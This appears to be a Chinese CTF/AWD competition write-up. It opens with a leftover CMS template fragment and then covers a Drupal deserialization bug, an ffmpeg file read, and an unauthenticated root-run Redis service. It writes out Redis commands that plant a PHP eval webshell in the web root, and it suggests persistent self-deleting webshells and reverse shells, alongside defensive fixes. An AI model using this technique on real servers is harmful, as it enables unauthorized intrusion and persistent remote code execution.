{#qishi_link set="列表名:link,显示数目:100,调用名称:QS_index,类型:1"#}
{#foreach from=$link item=list#}
<a href="{#$list.link_url#}" target="_blank" class="underline">{#$list.title#}</a>
{#/foreach#}
</div>
{#qishi_link set="列表名:imglink,显示数目:14,调用名称:QS_index,类型:2"#}
{#if $imglink#}
<div class="link_img">
{#foreach from=$imglink item=list#}
<div class="l_img"><a href="{#$list.link_url#}" target="_blank">![]({#$list.link_logo#})</a> </div>
{#/foreach#}
<div class="clear"></div>
</div>
{#/if#}
</div>
<!-- 列表-友情链接结束 -->
</div>
<!-- 主体结束 -->
{#include file="footer.htm"#}
</body>
</html>
第三题easyCMS
- 这题也是服务器设置不当导致部分目录遍历
- 进入templates/admin目录时发现title为flag
- 这题没啥思路了Orz。。。。希望大佬们能解答一下。。。
下午的AWD不出所料又是一道Web题
但是围绕这个Web题主办方开放了三个服务,分别是80端口的http服务,8888端口的由python跑的http服务,6379端口的redis服务 这里三个服务都各有一个洞(赛后询问主办方得知) 根据主办方的赛前公告 getflag的方法是运行位于/usr/tmp目录下的getkey程序即可打印出flag,但是赛后问出题人其实还有另外一个地方有明文flag。。。。。。
-
首先80端口的一个Drupal反序列漏洞 ,链接 https://paper.seebug.org/334/?spm=5176.app55885.3.2.XT8Apf 防御方法:及时修改admin密码
-
其次8888端口是ffmpeg的任意文件读取漏洞,emmm其实不知道这个有啥用。。。但是后来问出题人。。他说本来他也没想到这样用的。。因为其实服务器中还mount了一个虚拟硬盘,里面有明文的flag,所以可以用这个直接读取。。。。//但是个人觉得这个洞。。。。貌似根本补不了,没有这个权限。。。所以emmmmm 大家应该懂 防御方法:其实这个洞后来想了一下。。。可以写脚本无限访问del去删除,但是这个存在一个竞争的问题,因为操作机与别人攻击的机器是处于水平网络上的,所以如果对面也写脚本请求的话不一定能竞争成功。。
-
最后是6379端口的redis服务,我是拿了这个洞来打的。。。今天下午又犯蠢了。。ps aux发现redis之后很开心,兴冲冲连上去发现不用密码,输入info命令可以看到redis的配置文件位于 /var/lib/redis/6379/xxx 然后查看自己的配置文件发现有几个命令是被rename或者是移除的,比如migrate flushdb之类的 然后config命令被rename成了ccccooonnnnfig,shutdown被rename成了shutdown_123,然后加了自己的登录密码,自作聪明的上去把绝大多数人的redis down了,想着能美滋滋的收分。。。。。但是突然意识到这个awd是没有checker的!!!!崩溃Orz。。。后来发现甚至有人把自己的80端口的服务都down掉了(不知道他们是如何做到的,因为不提权的话根本不会有权限) 其实这里是可以用redis来进行任意文件写, 因为redis是用root权限运行的,而redis有一个save备份自身的kv对到文件的功能,也就是说,我可以执行以下命令来进行写shell
> ccccooonnnnfig set dir /var/www/html/drupal8/
> ccccooonnnnfig set dbfilename Pr0ph3t.php
> set Pr0ph3t "<?php @eval($_POST['yoooooo']); ?>"
> save
save命令执行之后 redis将会在80网站部署根目录下生成一个内容带有Redis字样的Pr0ph3t.php的文件 然后反弹shell之类的,权限为deamon用户 这里推荐写一个unlink自身的不死马,不会暴露是通过Redis服务写的shell 防御方法:开启redis的密码 以下命令
> ccccooonnnnfig set requirepass 你的密码
此命令设置后不用重启服务即可生效
相关资料:https://www.leavesongs.com/penetration/write-webshell-via-redis-server.html
写在最后: 其实这次比赛体验。。。大家心里都应该会有数。。。。。就不多说了。。。。
Did you like the post? Subscribe to the feed.